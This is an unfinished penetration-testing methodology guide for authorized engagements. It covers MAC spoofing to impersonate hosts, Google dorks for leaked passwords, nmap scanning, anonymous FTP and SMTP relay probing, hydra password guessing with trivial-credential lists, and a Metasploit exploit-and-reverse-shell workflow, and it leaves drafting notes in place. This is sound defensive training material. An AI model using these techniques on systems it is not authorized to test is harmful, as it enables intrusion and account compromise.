The understanding that many of the tasks included in a pentest can result in the remote compromise of the system, disruption of the system's operation, denial of service conditions, and the alteration of data and/or code. There is no intention on the part of R&C to cause disruption to any system, but many techniques and exploits can destabilize a system, leading to the interruption of services/availability or the alteration of files (data, code...). A verified plan, and the resources necessary to recover from any type of disruption, must be in place before the active engagement begins.
Technique Limitations:
Identify those that are required, optional, or prohibited: DoS, social engineering, password guessing, remote shell, acquiring identifiable information, placing payload files. Note that avoiding being logged, tampering with logs, and altering production/system data or code are all considered out-of-scope.
Goals:
Identify and report vulnerabilities, compromises, and enticements.
Deliverables:
A PDF report of the findings and suggested remediation that will allow the client to address all identified issues.
Important - Consider updating the instance of Kali Linux that will be used during each engagement. This will also update the tools bundled with Kali for pentesting. This is accomplished by running the following command(s) at the Kali shell console as root. See the apt-get manpage for details.
♦ sudo apt-get update
♦ sudo apt-get upgrade
♦ sudo apt-get dist-upgrade
You might also want to install LibreOffice to work with the report documents and templates provided with The Purple Files. This can be done by running the following commands, as root, from a terminal:
♦ sudo apt-get update
♦ sudo apt-get install libreoffice
The Purple Files is a collection of files, each located in a specific directory structure. This structure helps make The Purple Files self-contained, in that it does not rely on files outside of that directory structure. That also makes it portable, in that you can copy that directory structure to any location you like and use it there.
┌─ThePurpleFiles/ (The Directory Root)
├── data/ (data files such as lists)
├── documents/ (templates and more detailed information)
├── js/ (JavaScript files)
├── pics/ (Images)
├── Workspace/ (All files created during an engagement)
├── favicon.ico (Webpage icon)
└── ThePurpleFiles.html (Main Page)
Within The Purple Files directory structure there is a workspace directory at the root. Workspace is used to store all the files created, intel gathered, results produced, and reports, along with any other files created during an engagement. After active scanning and probing has concluded, each file in the workspace directory should have a sha512sum hash generated and saved for future comparison. The workspace directory can then be compressed and archived as needed.
For each engagement, workspace should start empty. After an engagement, a sha512sum hash should be generated for each file in workspace and saved for future comparison. See the Housekeeping section for more information and an example.
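As a minimal sketch of that hashing step (paths are illustrative; the Housekeeping section has the full example):

$ cd ~/ThePurpleFiles
$ sha512sum workspace/* > workspace.sha512    # record a hash for every file
$ sha512sum -c workspace.sha512               # later, verify nothing has changed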
Then all commands should be run from within workspace.
So before launching any commands or taking any notes, change to the Workspace directory.
There are times you may want to set the MAC address (https://en.wikipedia.org/wiki/MAC_address) of the host you are using so that it will appear to be some other type of device. This can better position you to access a target, and give you a degree of anonymity. You can also impersonate another host on the network by setting your MAC to the MAC address of a legitimate host on the network. Keep in mind that duplicate MAC addresses will cause problems and trip alerts, so you will want to wait until the other host is offline, or arrange to have it taken offline.
To change your MAC address in Linux, click on the icon to the right to open the detailed instructions and examples.
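As a quick sketch of the idea (assuming the macchanger utility bundled with Kali and an interface named eth0; the detailed page covers alternatives):

$ sudo ip link set eth0 down
$ sudo macchanger -r eth0      # assign a random MAC address
$ sudo ip link set eth0 up

Use macchanger -m XX:XX:XX:XX:XX:XX eth0 to set a specific address instead of a random one.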
As stated earlier, it is critical that you record your observations and findings as they occur. Click on the book icon to the right for more information.
Throughout the pentesting process you will want particular information, findings, actions, milestones and so on to be logged not only into work-files for your reference, but also into the template report so that at the end of the active process your report is practically complete.
Before you run ANY commands, probes, scans of any sort you should begin to record in detail your activity. This means keeping a notes file that documents your actions and observations, and a couple other techniques shown below.
For one, you want to log in detail all traffic your host transmits and receives across your network connection. This can be done using the tcpdump utility.
Having a detailed log of all communication between you, the pentester, and any other host, as well as the background chatter that occurs on every network, will be invaluable if you need to explain or prove any of your actions or the behavior of the tools you employed.
This log should be stored in the workspace directory, and a sha512sum hash generated and archived with all of the other files in workspace. The sha512sum hash value can be used to show that the hashed material has not been altered in any way.
You will want to open a terminal and change to the workspace directory. Assuming you installed/copied The Purple Files into your root directory you can use the following command to move into the workspace directory.
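For example, assuming the files were placed under root's home directory (adjust the path to match your installation):
cd /root/ThePurpleFiles/workspace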
tcpdump must be run as root. The parameters are shown below; you can run tcpdump -h to get a summary of all supported parameters.
♦ -i wlan0 (the interface is wlan0)
♦ -B 8192 (the buffer is increased in size from 2048 to 8192 to avoid dropping packets)
♦ -s0 (snap length is set to "all bytes" so that each packet is captured completely rather than just the first portion)
♦ -w (name of the file in which to store the captured packets)
You can determine the interface (-i parameter) with the following command:
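For example, either of these standard commands will list the available interfaces:
ip link show
tcpdump -D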
You can include the client name and start datetime stamp in pcap's filename using the following example.
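A possible form, assuming the client identifier 'YYZ.company' and interface wlan0:
sudo tcpdump -i wlan0 -B 8192 -s0 -w YYZ.company.$(date +%Y.%m.%d-%H.%M.%S).pcap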
After all of your activity is finished, close tcpdump using Ctrl+C. This will produce a short report of how many packets were captured or dropped.
You should also consider running the script command in the console window you are working in so as to capture both the commands and their results. Using 'script' to create an output log of the commands and responses displayed in a terminal lets you copy them into the template report. Note that the point is not to fill the report with commands and results, but rather to capture all commands and responses into a log of some sort and then copy the relevant portions into the report's profile, observations, and intrusion sections. The point is not how the issue was found/leveraged, but the existence of the issue and its remediation.
The script command, when logged to an output file, will automatically include a timestamp when the logging begins and when it ends. In the example below, the '-a' parameter instructs script to append output if the file already exists. It is best to change 'filename.txt' to something that describes its contents, such as console.log.YYZ.company.txt
Example of the script command (as with most command line programs, the --help parameter will display the supported parameters):
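For example, using a filename that follows the suggestion above:
script -a console.log.YYZ.company.txt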
To terminate the script process and stop recording the terminal activity, press Ctrl+D
The goal of the Reconnaissance section is to gather as much useful information as you can, primarily from sources other than the target itself.
That information will be used in the Exploit section to select specific exploits to consider and how they should be configured.
There is typically little to be cautious about during Reconnaissance since you are performing well-behaved queries of public sources of information. There should be no attacks launched or unauthorized access involved in your Reconnaissance activities.
It is important to record most of the information you discover. While some information may appear directly applicable to your pentesting, some may not appear relevant. Record most, if not all, of what you discover, because you cannot be sure which information you can leverage until you are in the attack section. In some cases the information you discover should be included in the final report to make the client aware of what can be discovered by anyone and then leveraged against them. Information leakage is itself a vulnerability that has no "attack" associated with it; the discovery alone is the "attack".
Keep in mind that you do not want to limit your investigation to the primary target host. Other hosts may provide several attack vectors, and you want to identify as many as possible. So apply the following tools and techniques to any host that might be a stepping stone to demonstrate compromise and the weaknesses that allow it.
Wayback Machine - review historic iterations of web apps and content. By poking around in older code (view source) you might find information that could assist your review, such as comments, passwords, paths, all sorts of things that have since been removed.
DNS host - identify domains, aliases, hostnames, IPs... Also MX lookup, blacklists, and email analysis.
Whois - identify registrant and contact information.
Forum discussions - identify information leakage, staff info...
"We provide IP address tools that allow users to perform an Internet Speed Test, IP address lookup, proxy detection, IP Whois Lookup, and more."
Shodan is the world's first search engine for Internet-connected devices.
Be sure to record in detail the relevant information you find including the URL where it was found and the datetime you found it. You may need it as a reference, and might need to include it in the final report.
"Google dorking is a hacking technique that makes use of Google's advanced search services to locate valuable data or hard-to-find content." (https://www.techopedia.com/definition/30938/google-dorking)
The point here is to search for Information Leakage (confidential or sensitive information that has been posted unintentionally that can help further an intrusion).
There are many types of information you want to look for with these queries.
For example, people create, use, and post spreadsheets. With MS Excel, a new "spreadsheet" typically has three tabs representing three distinct worksheets within that one file. People will work with the first and ignore the other two - but not always. At times the other two tabs will contain information that is either unknown to the originator, or thought "hidden" by the originator. You will want to search for MS Office files that are associated with the target and review each manually to determine if information has been leaked, either in extra worksheets or in the metadata contained in all MS Office files (user names, directory paths, comments, phone numbers, etc.)
An aspect of the mindset that best serves a pentester is to see files, data, locations, everything from the perspective of a novice user. We techs tend to look for information where we would hide it, or where another tech would hide it. But the majority of files and materials we review are created, managed, posted, and secured by non-technical users. If some information is out of their sight, it is often out of their mind - and they assume out of everyone else's minds. For example, you can still find passwords written on post-it notes stuck underneath keyboards! You can still find passwords included in comments of scripts, HTML pages, and so on.
So you will want to construct Google dorks that look for file types along with target identifiers.
Specifiers
♦ filetype - narrow a search to specific types of files such as pdf, txt, xml, odt, doc, sql, zip, and so on
♦ ext - like filetype, but instead looks for files with a specific file extension
♦ intext - search the whole page for keywords
♦ allintext - similar to intext, but all keywords must be found
♦ site - restrict the search to a specific website
Examples
Find pages with simple directory listings
intitle:"Index of /"
Find pages with these strings in their content
intext:"Network Vulnerability Assessment Report"
intitle:"index of" password
Find "log" files that contain all of the keywords username password admin
allintext:username password admin filetype:log
Open FTP service
intitle:"index of" inurl:ftp
Spreadsheet containing email info
filetype:xls inurl:"email.xls"
Search a specific site, filetype, and keywords in the content
site:targetsite.org filetype:txt password user
site:targetsite.org budget filetype:xlsx OR budget filetype:csv
You can find more information about Google Dorking at these sites.
During Enumeration you search public resources for information about the target and its environment. This can include systems logically near the target.
This information will be used to focus subsequent efforts on items and areas that are most likely vulnerable.
Be sure to poke around the general purpose information resource sites as well as sites and services logically near the target.
Enumeration tools include site-specific search facilities, scanning tools, and querying tools.
Be sure to log everything you find, even if it does not seem to be a strong indicator. There are times that several "weak" pieces of information will combine to become much more significant. In other cases, a weak piece of information can assist with other efforts.
Below are several sections that focus on the nmap tool. While most people use nmap as a port scanner, it provides advanced capabilities through the NSE (Nmap Scripting Engine). There are a large number of scripts included with nmap that can do much more than port scanning, as you will see in these examples.
Note that for the most part the ports have NOT been set in these examples. For most of the examples below you will need to replace the {targetport} with the actual port(s) you want scanned; example commands for the script scans are consolidated after the list of script scans below. Ports can be defined in several ways:
♦ Just one - 80
♦ A list that is comma separated - 80,443,8080
♦ By range - 2000-4096
For detailed information on the nmap program, its uses, and its results double click on the button to the right.
You will usually want to run the three scans illustrated below. They will provide a huge amount of information that will assist in your analysis.
Note that since many of these scans can run for quite a while, you can always press the space bar while an nmap scan is running in order to see its current status.
Run at least this scan. This is a full portscan with OS detection and service version detection. This is usually a long running scan.
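A possible form of this scan (the IP is a placeholder; -p- scans all TCP ports, -O fingerprints the OS, -sV identifies service versions, -oA saves the results in all three nmap output formats):
sudo nmap -sS -p- -O -sV -oA full.tcp.scan 10.1.1.50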
One of the first scans can be one that simply identifies responsive hosts. In this case we check all IP addresses from 1-254 for indications that a host is active at each address. Once you know which hosts are responsive, you can focus subsequent nmap scans on just those hosts.
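A possible form, assuming a /24 network:
nmap -sn 10.1.1.1-254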
Identify all responsive services and their make/model/version. This, or something similar should be run on every host being reviewed.
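A possible form (placeholder IP):
nmap -sV 10.1.1.50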
Note that the following scan should be run on most HTTP services and not just port 80.
Generate a directory map of the target web site - Make sure the port are set correctly.
Display help for a specific script - Set script name
Run all of the default scripts
Run all of the scripts considered safe
Identify the Web authentication methods - Set page path, and port(s)
Identify HTTP methods - Set port(s)
List and review server headers - Set port(s)
Identify enabled WebDav sites - Set port(s)
Display only the HTML comments - Set port(s)
Scan for default accounts - Set port(s)
Review and investigate the robots.txt file
Display the robots.txt file - Set port(s)
Gather the banner(s) - Set port(s)
A service version scan of specific port(s) - Set port(s)
Query SSL/TLS versions - Set port(s)
Find virtual hosts on an IP address
Brute forces a web server path in order to discover web applications in use
... and here provide a specific basepath
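Hedged example forms of the script scans listed above, using standard NSE script names; the IP 10.1.1.50 and all ports are placeholders that must be set for your target:
nmap -p80,443 --script http-sitemap-generator 10.1.1.50   # directory map of the web site
nmap --script-help http-enum   # help for a specific script
nmap -sC 10.1.1.50   # run all of the default scripts
nmap --script safe 10.1.1.50   # run all of the scripts considered safe
nmap -p80 --script http-auth --script-args http-auth.path=/login 10.1.1.50   # web authentication methods
nmap -p80 --script http-methods 10.1.1.50   # supported HTTP methods
nmap -p80 --script http-headers 10.1.1.50   # server headers
nmap -p80 --script http-webdav-scan 10.1.1.50   # enabled WebDav sites
nmap -p80 --script http-comments-displayer 10.1.1.50   # HTML comments only
nmap -p80 --script http-default-accounts 10.1.1.50   # default accounts
nmap -p80 --script http-robots.txt 10.1.1.50   # display the robots.txt file
nmap -p21,25,80 --script banner 10.1.1.50   # gather service banners
nmap -sV -p443 10.1.1.50   # service version scan of specific port(s)
nmap -p443 --script ssl-enum-ciphers 10.1.1.50   # SSL/TLS versions and ciphers
nmap -p80 --script http-vhosts 10.1.1.50   # virtual hosts on an IP address
nmap -p80 --script http-enum 10.1.1.50   # brute force paths to discover web applications
nmap -p80 --script http-enum --script-args http-enum.basepath=/app/ 10.1.1.50   # ... with a specific basepath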
Scripts by category
Metasploit is an incredible tool. We will be using the portions of metasploit that are useful in enumeration, and then later in the Attack section.
The material below provides a quick and concise guide for using metasploit, but it assumes you are familiar with it. If you are new to metasploit, click on the image to the right to view additional information intended to introduce you to using metasploit. Be sure you are familiar and comfortable with that material before proceeding.
Tips
Resize the console window's width for a more readable display.
Often the output of a command will scroll through several screens of info. Use Shift+PgUp and Shift+PgDn to scroll through the output. The arrow keys scroll you through the command history list.
These examples will display the information about each enumeration module rather than launch it. Each module requires specific parameters which must be set before running the module.
You can use this button to generate a new page that contains many of the commands shown below. Each command may have required options that must be included, but afterwards can be saved as an .sh shell script or copied and pasted into a terminal for execution.
Check login
TCP
UDP
♦ The goal for that step
♦ How that step relates to or assists the other steps
♦ Tips, advice, and warnings about performing each step
♦ Description of each tool, the value it provides to each step, how it can be run, and how to use its results
♦ The types of information that should be logged in each step, what notes to make...
Use the following command to examine the non-exploits available in metasploit. Each directory contains potentially useful modules for each of the protocols listed.
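For example, on a standard Kali installation (the path is an assumption):
ls /usr/share/metasploit-framework/modules/auxiliary/scanner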
(Directories within the /scanner directory)
acpp, afp, backdoor, chargen, couchdb, db2, dcerpc, dect, discovery, dlsw, dns, elasticsearch, emc, finger, ftp, h323, http, imap, ip, ipmi, jenkins, kademlia, llmnr, lotus, mdns, misc, mongodb, motorola, msf, mssql, mysql, natpmp, nessus, netbios, nexpose, nfs, ntp, openvas, oracle, pcanywhere, pop3, portmap, portscan, postgres, printer, quake, rdp, redis, rogue, rservices, rsync, sap, scada, sip, smb, smtp, snmp, ssh, ssl, steam, telephony, telnet, tftp, udp_scanner_template.rb, upnp, vmware, vnc, voice, vxworks, winrm, x11
While this step is listed in the 'Enumeration' section of our methodology, once you have successfully logged in it could be considered an 'attack'.
Port 21 is used by FTP (and explicit FTPS); note that SFTP, despite the name, runs over SSH on port 22.
Click the image to the right to view the unpacking.html page for examples and explanations of using ftp.
When port 21 is found open be sure to test it using an FTP client.
The illustration below shows running the ftp client program with the target IP as the only parameter. After a couple of lines in which the ftp server identifies its product information, you are prompted for login credentials. Enter the user name 'anonymous', and then for the password enter any syntactically correct email address, for example me@here.com, pentester@goodguys.com, or admin@company.org
Note that the commands you enter are in bold.
$ ftp 127.0.0.1
Connected to 127.0.0.1
220 Microsoft FTP server ready.
User (127.0.0.1:(none)): anonymous
331 Please specify the password.
Password: {An email address}
230 Login successful.
ftp> bye
You will then see if you have successfully logged in or not. If successful you will be at the ftp prompt connected to the target ftp server. Commands you type here are sent to the server and executed there. To exit the FTP program enter the command 'bye'.
At this point it is a good idea to run the command 'help'. The target server will respond with a list of the commands it supports. That tells you what you can work with.
For the most part you will use the 'cd' command to change directory, and the 'ls' command to list the contents of the current directory.
The goal here is to poke through many if not all of the directories you have access to, to see if you can find any material of interest. You also want to attempt to upload a file to the ftp server to verify whether or not you have that permission. If this host is a printer, uploading a file may be one way to submit something for printing. So type up an explanatory file and try to upload it, then refresh the listing to see if the file is removed - meaning it was probably printed.
Either anonymous login or file upload permissions should be included in the report.
Like ftp, successfully logging into a telnet server could be considered an attack. Use your discretion.
Click the image to the right to view the unpacking.html page for examples and explanations of using telnet.
In this example port 25 is open. You will usually find many open ports that are not clearly labeled or identified. One quick way to poke at them in hopes of finding something of interest is to use the telnet client to attempt to open a session on that port. In many cases you might get a banner, or even a session.
Port 25 is used by SMTP (email post offices). Besides getting a banner, in some cases you can also create and send email through this telnet session.
In the illustration below, the telnet client is launched using the IP address and port number you want to connect to. The next line is the product and version number as provided by the server. You will want to check the public resources for information on any vulnerabilities known for this product.
Then enter the command 'HELO' (note the spelling). If all is well, the server will reply with its own 'Hello' message.
Next, the 'MAIL' command is entered with the 'FROM:' parameter.
Next, the 'RCPT' command is entered. This targets the post office the mail is to be delivered to.
Next the 'data' command is entered. This tells the target post office that the following is the body of the mail message.
Enter whatever material you want sent. When you are done, enter a line containing only a period; this tells the post office the message is complete, and it attempts to deliver your email.
You can then exit the telnet session you have with the target using the command 'quit'.
Note that the commands you enter are in bold.
$ telnet 10.1.1.64 25
220 primaryweb.com Microsoft ESMTP MAIL Service, Version: 4 2.0.3398.7327 ready
HELO
250 primaryweb.com Hello [10.1.1.64]
HELO williambellamy.com
250 primaryweb.com Hello [10.1.1.64]
MAIL FROM: Me@Here.com
250 2.1.0 Me@Here.com....Sender OK
RCPT TO: admin@site.com
250 2.1.5 admin@site.com
data
354 Start mail input; end with <CRLF>.<CRLF>
This is a test.
.
250 2.6.0 <NET0301@primarydev.pubdev.site.com> Queued mail for delivery
quit
221 2.0.0 primaryweb.com Service closing transmission channel
Connection to host lost.
Note that the names 'nc', 'netcat', and 'ncat' all refer to an executable program (nc) that was originally written in the 90s. Since then several rewrites have been released. We will be using the 'ncat' version, which comes with the 'nmap' program.
Netcat is a very powerful tool that you should become familiar with. Click the image to the right to view the nc.html page for examples and explanations of using nc (netcat).
NetCat can be used to probe a web service (along with many others) to see what types of information it will provide.
First run 'ncat' providing the '-vv' for 'very verbose' and '-n' for 'no DNS lookup' as parameters followed by the IP and port of your target.
'ncat' will report whether the port is open or not. If you are returned to the command prompt, the session failed. Otherwise you will have a blinking cursor waiting for input.
Because this is an HTTP service, you need to send the HTTP method, 'HEAD' in this example, followed by the full path to the resource you are targeting. In this example we use a simple '/' to indicate the document root of the web server rather than a specific page. After the path we provide the version of HTTP we are willing to use; here we use an older version, 'HTTP/1.0', so we do not need to key in the additional header information that newer versions of HTTP require.
Press Enter (carriage return) twice. This is required by the HTTP protocol; the blank line is the delimiter that tells the server this HTTP message is complete and ready to process.
You will usually then receive the HTTP headers and body of the page you pointed to in the path parameter.
You can submit all HTTP methods this way, including OPTIONS, GET, and POST.
Note that the commands you enter are shown in bold.
$ ncat -vv -n 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
HEAD / HTTP/1.0
{second enter key}
HTTP/1.0 302 Found
Location: https:///
Server: BigIP
Connection: close
Content-Length: 0
sent 17, rcvd 96: NOTSOCK
Ben, come back here and update this section.
Nikto is one of the web-oriented vulnerability scanning tools we use to run web site scans, along with the OWASP ZAP proxy shown below.
Although nikto has a time limit set, it can continue to run long after it has gathered all of the information it is going to get. You can terminate nikto by pressing Ctrl+C.
Be sure to set the correct port number(s) if needed. You can have several ports listed per command as long as they are comma delimited and there is a space after -p.
Run nikto with SSL support - set the host, port, and output filename.
Run nikto without SSL - set the host, port, and output filename.
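Possible forms (the host, ports, and output filenames are placeholders):
nikto -h 10.1.1.50 -p 443 -ssl -o nikto.ssl.YYZ.company.txt
nikto -h 10.1.1.50 -p 80,8080 -nossl -o nikto.YYZ.company.txt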
ZAP is another web oriented vulnerability scanner. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
In Linux, /usr/bin/zaproxy launches /usr/share/zaproxy/zap.sh
After launching ZAP it will display pop-up windows showing the status of its loading. Then you will be prompted to select the type of session you want as illustrated to the right.
In the top right pane of the ZAP application window you will see this illustration. Simply provide the URL to the application in this pane and click the "Attack" button.
Then after the scan/attack has begun, you will begin to see the structure of the website displayed in the top left pane.
In the bottom pane you can click on the "Alerts" tab to review the list of issues that have been identified. (Click the image to expand)
Finally, you can click on the "Reports" pull-down to select producing the report in HTML or XML format.
Ben, see about a pl to parse the data into the MSWord template, maybe...
Enum4linux is used to enumerate Windows and Samba hosts and is written in Perl. The tool is basically a wrapper for smbclient, rpcclient, net and nmblookup.
Ben, flesh this out.
To get the help info:
enum4linux.pl [options] ip
-U        get userlist
-M        get machine list
-S        get sharelist
-P        get password policy information
-G        get group and member list
-d        be detailed, applies to -U and -S
-u user   specify username to use (default "")
-p pass   specify password to use (default "")
-a        do all simple enumeration (-U -S -G -P -r -o -n -i)
-o        get OS information
-i        get printer information
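For example, to run all of the simple enumeration options against a host (placeholder IP):
enum4linux.pl -a 10.1.1.50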
In this section we will query and poke at the potential vulnerabilities we have identified to determine if they are exploitable.
At this point we have gathered information about the target (reconnaissance), and specific information about the software it is running (enumeration). That gives us the specific points we want to evaluate for vulnerabilities.
This is probably the most delicate part of a pentest. We want to do what we can to determine whether a potential vulnerability is exploitable, but we do not want to do any damage or cause any disruption. The techniques in this section will, in most cases, be a violation of local, state, or federal law if you do not have adequate and appropriate permission, in writing, dated and signed, from someone who has the authority to grant you access to the system(s) as part of an agreed pentest (security analysis).
Be sure to have contact information on hand for people you can reach out to if you have any questions, suspect a problem, or need to coordinate with in any way. For example, a technique you perform is intended to make some sort of alteration on the target host. It may be helpful to have someone verify that the alteration was in fact made.
There are several tools that will be used in this section to attempt to exploit a vulnerability.
It is critical that during this step you log information and observations as you go. Be sure to use the logging methods covered in the "Record the Engagement" section under the "Preparation" section above. The information to log includes the datetime you launch a tool/technique, the syntax used, the response you receive (including the lack of a response), screen shots, error messages, completion messages, literally anything. This information will be necessary if you need to recreate, explain, defend, or for any reason recall your actions and the information on which you based your decisions and further actions.
If any of this scares or concerns you, it should! If anyone (the client, management, law enforcement, or lawyers) has questions, you want written notes that show in detail the events in question and your rationale regarding your actions and responses.
Ben, Make it clear that all the work up to this point was to gather intel that might point to potential vulnerabilities. Here you test, confirm, assume each of them using the tools shown. I need to have a section that also talks about each major attack tool/technique so as to correlate each potential vulnerability with how to probe/test it.
In the attack section, and even into the verification section (testing for false positives), emphasize checking the main vulnerability databases for remediation information. We do not want to fix the issues for the client; we want to give them links and notes that will help them fix the issues themselves. This not only fixes the issues we have identified, but helps to educate them more about their systems and how they can be at risk.
Caution - do not attempt any of these steps unless you are confident in the expected results and effects a given exploit will have on a target. Unexpected results do occur and are indications of vulnerabilities or deeper problems, but have a clear and detailed expectation before attempting any of these steps.
In this section you use the Target Profile you have built in the report template using the information gathered to this point in order to plan your attack(s). Here you attempt the techniques and exploits that are relevant to the potential vulnerabilities you have identified in order to circumvent or disrupt the target system's security features.
Search for known exploits on the Internet and local databases to flesh out the Target Profile (aka Attack Map) located in the report template in preparation for testing the relevant attack(s).
Ben, as noted above, emphasize checking the main vulnerability databases for remediation information in both the attack and verification sections. Consider writing some scripts that auto-search most of the online vulnerability databases for this info; use online sources as your vuln db.
The following sites are worth investigating after you have searched those above.
Dorks List - CXSecurity.com. This is another site that lets you search Bugtraq and other vulnerability databases.
Note that the searchsploit tool allows searching the local database.
To get help about the searchsploit tool:
searchsploit --help
Search for exploits having to do with 'windows', 'iis', and '7.5':
searchsploit windows iis 7.5
As you work through a pentest you will find points where you can gain unauthorized access. Something on screen, either graphic or textual, will indicate the successful access. You will want to record these to demonstrate your presence within that portion of the system. This is not about proving your success; it is about making an impact on the client. Simply saying "We got into your system." is not as effective as screen shots of confidential files, directory structures, administration screens, privileged application screens, and so on. You want to encourage action on the part of the client, and showing them proof that their system can be compromised is a great way to motivate them to address effective remediation.
In this section you gather examples that demonstrate each successful breach of security. This includes screen shots, posted files, captured files, etc...
♦ Copy specific files from a compromised target. If you do this, you need to take extreme care not to lose control of any copies or artifacts you might create during the engagement.
♦ Screen shot of remote shell displaying identifiable information. For example, "ipconfig /all", or "dir windows\system32\config".
♦ Acquire/download identifiable information.
♦ Use the script command to record your console session as you navigate through a compromised situation.
♦ Because the tcpdump tool recorded all of the network activity during an engagement, you can use the relevant sections of the pcap file to demonstrate an intrusion.
It is surprisingly common for a service, device, application to be installed and put into production without changing the default credentials to something adequately strong. These default credentials are easily discovered and can immediately lead to a significant intrusion.
Importantly, default credentials on a component that is not considered critical or important are as much a risk as if the component were critical. Remember that successful intrusions are seldom accomplished by attacking the target directly. Rather, you establish a foothold somewhere in the target's network and then work your way through different systems until you are in position to compromise the target(s). There is an old saying: "Once I have a platform inside a network, it is just a matter of time until I own all of your digital assets!"
If you find the default credentials, try them on the target service. If not, then manually try trivial credentials: usernames and passwords that are commonly used as defaults. Below are some examples:
Trivial Account Names
The-name-of-the-product, admin, administrater, administrator, adm, root, god, sys, system, operator, backup, bkup, remote...
Trivial Passwords
Remember to try variations in spelling and case.
null password, openup, letmein, keepout, toor, account-name, product-name, manufacturer-name, variations on 1234, 4321, 098765, 11111..., keyboard patterns such as qwerty, poiuy, 1qazxsw2, bhu89ijn..., secret, topsecret, private, public...
There are several default password lists you can refer to:
Be sure to search for the product's user manuals, setup manuals, installation manuals... for a specific product/version. These often include the default credentials. Search for things like: filetype:pdf setup manual guide manufacturer-name product-name
The data directory in ThePurpleFiles contains a list of common usernames and common passwords. These can be used in many of the password cracking tools.
In fact, many practitioners develop their own lists of user account names and passwords to supplement the lists you can find on the Internet.
We talked about Google Dorking back in the Reconnaissance section, where it was used to search for background information along with Information Leakage (the unintentional loss of control of confidential or otherwise sensitive information). Here, however, we will use Google Dorking to actually attack a system/organization. This may have nothing to do with the specific host we are engaged to attack, but it is a quick, easy, and often fruitful technique that should be added to most, if not all, engagements.
Again, these two links are great for general information along with examples of Google Dorking.
Information about the topic of Google Dorking: https://en.wikipedia.org/wiki/Google_hacking
Google Hacking Database https://www.exploit-db.com/google-hacking-database
The difference between using Google Dorks for Reconnaissance and for Attacking is that when attacking, we are looking for information that might lead to an intrusion rather than just Information Leakage.
Now let's see some specific examples of attacking with Google Dorks:
Ben, include several examples below.
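A few illustrative patterns of the kind intended here (targetsite.org is a placeholder):
site:targetsite.org ext:sql OR ext:bak OR ext:old
site:targetsite.org ext:log "password"
site:targetsite.org intitle:"index of" "backup"
site:targetsite.org filetype:env "DB_PASSWORD"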
Ben, straighten out these examples and line them up with the actual dictionary files etc... Also, can the output be saved to a report file?
The hydra tool will perform a live real-time password guessing attack against many types of online login systems. While hydra performs online password cracking attacks, offline password cracking is also a very important skill for pentesting. For more information on Password Cracking, click on the image to the right.
Be aware that this will generate a relatively large amount of network traffic and processing at the target. If there is a maximum number of login attempts allowed before locking the account, hydra will usually lock the account out. This traffic is also typically noisy and easily identified by Intrusion Detection Systems (IDS).
A very big hole that many attackers enter through is weak authentication. Most often the credentials used and maintained by an application are not as stringent, as complex, or as regularly changed as network credentials.
The hydra program can be used to point at an online application/service and attempt a series of login attempts using a list of user accounts and a list of possible passwords.
The hydra program uses files that contain account names and files that contain passwords to attempt logging in with every combination.
Ben, develop more of these accounts and password files.
Consider using the user account / password files that are located in the data/ directory. These include the most common and trivial user accounts and passwords for many of the common services.
Not included in these files are what are considered "trivial" credentials. These are usually best tested manually.
Account Names
root, admin, administrator, administrater, (product name), (account name)
Passwords
(blank), 123(456), password
The following examples each need to be manually configured before being run. Specifically, you need to set the account names file and passwords file that you want hydra to use.
In addition, you may want to customize both the account names and passwords files to better suit each specific target.
HTTP Form Example 1
Example 2
HTTP GET Example 1
Example 2
FTP Example 1
Example 2
SSH Example 1
Example 2
SMB - Windows
MSSQL
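Possible forms of the examples above, using standard hydra module syntax; the IP, the form path and failure string, and the users.txt/passwords.txt files (see the data/ directory) are placeholders to configure per target:
hydra -L users.txt -P passwords.txt 10.1.1.50 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
hydra -L users.txt -P passwords.txt 10.1.1.50 http-get /admin/
hydra -L users.txt -P passwords.txt ftp://10.1.1.50
hydra -L users.txt -P passwords.txt ssh://10.1.1.50
hydra -L users.txt -P passwords.txt smb://10.1.1.50
hydra -L users.txt -P passwords.txt mssql://10.1.1.50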
Note that there is a large list of custom wordlists in the /usr/share/metasploit-framework/data/wordlists directory. There is also a large repository of passwords located at the following link:
See the Reference section for more information about the hydra program.
The overview:
Do not run an exploit unless you are sure it is relevant to the target, and you understand the intended results. In many cases you may want to be in contact with the client while you run certain attacks so that they can confirm the results, and if necessary restart the host.
Rather than provide ready-to-run examples, when launching an actual exploit you need to manually configure and run each attack. This helps ensure that you are clear on the attack you are about to run and its intended results.
The overall process is as follows (Note that these examples do not copy to the clipboard when double clicked).
Searching for exploits
Make sure you have metasploit version 4.13.8 or later; otherwise the search function will behave oddly.
The first step is to search for exploits that are relevant to the potential vulnerabilities that were discovered and highlighted in the Target Profile. This is not as simple as it would seem. A given exploit can have several names and descriptions. So you often have to gather the identifying details of an exploit and search for them.
The basic search syntax is:
msf> search <search operator>:<search term>
Ben, change this to a simple link to an external page. ./UsingMetasploit.html
Below is a concise illustration of the typical use of metasploit. Double click the icon to the right for more information on searching for candidate exploits.
Begin by searching for exploits using keywords.
search name:iis
Another approach would be to use the tab completion feature and scroll through all the exploits under that folder.
use exploit/windows/fileformat/ (tab-key)
search name:smb type:exploit platform:windows
You can also visit the rapid7 vulnerability database search page at https://www.rapid7.com/db and provide the search terms and then select "all" database from the pull-down.
search ^windows/.*rpc.* -r good -t exploit
You can also use wildcards:
search -t exploit windows/smb.*ms0
1. Search for a candidate exploit
2. Review each candidate exploit's information
3. Pick an exploit
use (exploit name)
4. Set the required options (show options)
set RHOST 127.0.0.1
5. Review and set the target (show targets)
set target {target number}
6. Review and set the payload, usually a 'reverse_tcp' variant (show payloads)
set payload {payload path}
7. Run the exploit
exploit
8. Evaluate and document the results
9. Start a new attack process from scratch
back
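A condensed walk-through of the steps above, using the well-known ms17_010_eternalblue module purely as a stand-in example (all IPs are placeholders):
msf > search type:exploit name:smb
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > show options
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.1.1.50
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.1.1.10
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
msf exploit(windows/smb/ms17_010_eternalblue) > back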
When you search for a keyword(s) the entire record is queried for the keyword(s).
While running these types of probes, keep an eye out for information leakage in error pages that any of these types of probes might trigger. In fact, when you receive an error page, remember that it is just an HTML page, so inspect the source code itself for information leakage such as copyright dates, comments, paths, and so on.
